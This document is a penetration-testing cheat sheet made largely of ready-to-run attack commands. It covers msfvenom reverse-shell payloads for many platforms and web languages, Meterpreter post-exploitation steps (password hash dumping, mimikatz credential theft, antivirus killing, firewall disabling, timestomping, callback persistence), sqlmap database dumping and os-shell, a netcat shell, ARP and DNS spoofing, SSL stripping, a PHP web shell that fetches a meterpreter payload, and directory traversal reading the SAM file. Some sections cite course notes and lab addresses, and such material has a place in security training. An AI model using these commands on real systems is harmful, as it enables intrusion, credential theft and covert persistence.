Metasploit Cheat Sheet

List payloads

msfvenom -l

I. Binaries

Linux

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf

Windows

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe

Mac

msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f macho > shell.macho


II. Web Payloads

PHP

msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php

(The raw PHP output has no opening <?php tag; the second line prepends it.)

ASP

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp

JSP

msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp

WAR

msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war

III. Scripting Payloads

Python

msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > shell.py

Bash

msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh

Perl

msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw > shell.pl

For all shellcode, see 'msfvenom --help-formats' for the list of valid output formats. msfvenom will output the shellcode in the chosen language's syntax so that it can be pasted directly into your exploit.

IV. Shellcode

Linux Based Shellcode

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f

Windows Based Shellcode

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f

Mac Based Shellcode

msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f

V. Handlers

Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive your incoming shells. Handlers should be in the following format.

use exploit/multi/handler
set PAYLOAD
set LHOST
set LPORT
set ExitOnSession false
exploit -j -z


Meterpreter Useful Commands:

upload file c:\\windows                        (upload a file to the target)
download c:\\windows\\repair\\sam /tmp         (download a file from the target)
execute -f c:\\windows\\temp\\exploit.exe      (run a program on the target)
execute -f cmd -c                               (run cmd.exe and channelize it)
ps                                              (list running processes)
shell                                           (drop into a system shell)
getsystem                                       (attempt to elevate to SYSTEM)
hashdump                                        (dump password hashes)
portfwd add -l 3389 -p 3389 -r target           (forward local 3389 to target 3389)
portfwd delete -l 3389 -p 3389 -r target        (remove the forward)


Additional useful commands are as follows:

  • msfconsole -r unicorn.rb
  • meterpreter shell
  • getsid
  • getuid
  • migrate
  • getsystem
  • run killav
  • run checkvm
  • exploit Windows7 Service Pack 1 msp
  • use incognito
  • run countermeasure
  • run countermeasure -d -k
  • shell
    • netsh firewall set opmode disable //disable firewall
  • run vnc
  • load mimikatz
  • ls
  • upload /home/user/mimikatz.exe C:\\
  • timestomp mimikatz.exe -f "C:\\Windows\\System32\\cmd.exe"
  • shell
    • mimikatz.exe
    • privilege::debug
    • inject::process lsass.exe sekurlsa.dll
    • getLogonPasswords
    • sekurlsa::logonPasswords full
  • run persistence -A -L C:\\ -X -i 10 -p 443 -r 192.168.0.196
  • attrib +h c:\autoexec.bat //make it hidden
  • Priv Esc Exploit CVE-2014-4113 (ms14_058_track_popup_menu)


Burp Suite and sqlmap

1. Burp Suite -> Intruder
   http://www.site.com/section.php?id=51

2. sqlmap
python sqlmap.py -u "http://www.site.com/section.php?id=51"

# Discover databases
python sqlmap.py -u "http://www.site.com/section.php?id=51" --dbs

# Find tables in a particular database
python sqlmap.py -u "http://www.site.com/section.php?id=51" --tables -D database_name

# Get columns of the table
python sqlmap.py -u "http://www.site.com/section.php?id=51" --columns -D database_name -T users

# Get data from the columns
python sqlmap.py -u "http://www.site.com/section.php?id=51" --dump -D database_name -T users

# Upload os-shell
python sqlmap.py -u "http://www.site.com/section.php?id=51" --os-shell

# Upload a PHP shell
-> b374kshell.php

Netcat Shell and Persistence

# Notes on Cybrary “Advanced Penetration Test”
Opening a command shell listener:
root@kali:~# nc -lvp 1234 -e /bin/bash

Transferring files:

Redirect output to a file:
root@kali:~# nc -lvp 1234 > netcatfile

Send a file from another terminal:
root@kali:~# nc 10.0.0.100 1234 < mydirectory/myfile

Automating Tasks with cron jobs
Add your task to one of the scheduled directories
*For more flexibility add a line to /etc/crontab

Information Gathering

# Source: Cybrary “Advanced Penetration Test”

*Find as much information as possible about the target.
*What domains do they own? What job ads are they posting? What is their email structure? What technologies are they using on publicly facing systems?

(1) Google Dorks
Database of helpful Google Dorks: http://www.exploit-db.com/google-dorks/
Example: xamppdirpasswd.txt filetype:txt finds xampp passwords

(2) Shodan (Python API)
Search engine that uses banner grabbing

(3) Whois
Domain registration records
root@kali:~# whois ________.com

(4) DNS Recon
root@kali:~# host www.________.com
root@kali:~# host -t ns ________.com
root@kali:~# host -t mx ________.com

*DNS Zone Transfer 
root@kali:~# host -t ns zoneedit.com
root@kali:~# host -l zoneedit.com ns2.zoneedit.com

DNS Bruteforce
root@kali:~# fierce -dns ________.com

(5) Netcraft
http://searchdns.netcraft.com/

(6) The Harvester
The Harvester automatically searches for emails etc. online
root@kali:~# theharvester -d ________.com -l 500 -b all

(7) Maltego
Graphical information gathering and correlation tool
root@kali:~# maltego

(8) Recon-ng
Reconnaissance framework
recon-ng > use recon/hosts/enum/http/web/xssed
[recon-ng][default][xssed] > show options
recon-ng [xssed] > set DOMAIN ________.com
DOMAIN => ________.com
recon-ng [xssed] > run

(9) Port Scanning
Nmap
root@kali:~# nmap -sS 192.168.20.9-11 -oA synscan
root@kali:~# nmap -sU 192.168.20.9-11 -oA udpscan

Metasploit Port Scanners
search portscan (shows portscan modules)
scanner/portscan/tcp (runs a TCP connect scan)
Use auxiliary modules like exploits (use, set, exploit, etc.)

Vulnerability Identification

Source: Georgia Weidman, “Advanced Penetration Test” Cybrary
Query systems for potential vulnerabilities

(1) Nessus
Vulnerability database + scanner 

(2) Nmap Scripting Engine
Vulnerability scripts
Listed in /usr/share/nmap/scripts in Kali

nmap -sC 172.16.85.135-136
nmap --script-help=smb-check-vulns
nmap --script=nfs-ls 172.16.85.136
nmap --script=smb-os-discovery 172.16.85.136

(3) Metasploit Scanners
auxiliary/scanner/ftp/anonymous

Web Application Scanning
(1) Dirbuster
Graphical tool that is used for bruteforcing directories and pages.

(2) Nikto
Vulnerability database of known website issues
nikto -host http://172.16.85.136

Manual Analysis
*Default passwords – Webdav
*Misconfigured pages – open phpMyAdmin
*Port 3232 on the Windows system – sensitive webserver with directory traversal

Capturing Traffic

Source: Georgia Weidman on “Advanced Penetration Test”

(1) ARP Spoofing
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t 192.168.20.11 192.168.20.10
arpspoof -i eth0 -t 192.168.20.10 192.168.20.11

(2) Domain Name Service (DNS)
DNS Cache Poisoning
hosts.txt: 192.168.20.9 www.gmail.com
*Restart arpspoofing between gateway and target
dnsspoof -i eth0 -f hosts.txt

(3) Secure Socket Layer (SSL)
Crypto between browser and webserver
Can't see credentials in plaintext

SSL Man in the Middle
SSL Stripping

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
Spoof the default gateway with Arpspoof
sslstrip -l 8080

Exploitation: Basics

Source: Georgia Weidman on “Advanced Penetration Test”

(1) Webdav Default Credentials
Default -> wampp:xampp

a. cadaver http://192.168.0.190/webdav
b. Use Msfvenom to create a PHP shell and upload
c. Use msfconsole to exploit

(2) Open phpMyAdmin
a. Create a php shell on the Apache server using a SQL query
SELECT ““”””” into outfile “C:\\xampp\\htdocs\\shell.php”

http://192.168.0.190/shell.php?cmd=ipconfig

b. Add a meterpreter PHP file
http://192.168.0.190/shell.php?cmd=tftp 172.16.85.131 get meterpreter.php C:\\xampp\\htdocs\\meterpreter.php

(3) Downloading Sensitive Files
Zervit 0.4 directory traversal
nc 192.168.20.10 3232
GET /../../../../../boot.ini HTTP/1.1

http://192.168.0.190:3232/index.html?../../../../../../xampp/FileZillaFtp/FileZilla%20Server.xml
http://192.168.0.190:3232/index.html?../../../../../../WINDOWS/repair/sam

(4) Exploiting a Buffer Overflow
Buffer overflow in SLMail
windows/pop3/seattlelab_pass

(5) Exploiting a Web Application
Unsanitized parameter in graph_formula.php -> PHP code execution
unix/webapp/tikiwiki_graph_formula_exec

(6) Piggybacking on a Compromised Service
VsFTP -> backdoored
Username ending in a :) spawned a backdoor on port 6200

(7) Exploiting Open NFS Shares
NFS on port 2049
showmount -e 172.16.85.136
ssh-keygen
mkdir /tmp/r00t/
mount -t nfs -o nolock 172.16.85.136:/export/username/ /tmp/r00t/
cat ~/.ssh/id_rsa.pub >> /tmp/r00t/.ssh/authorized_keys
umount /tmp/r00t/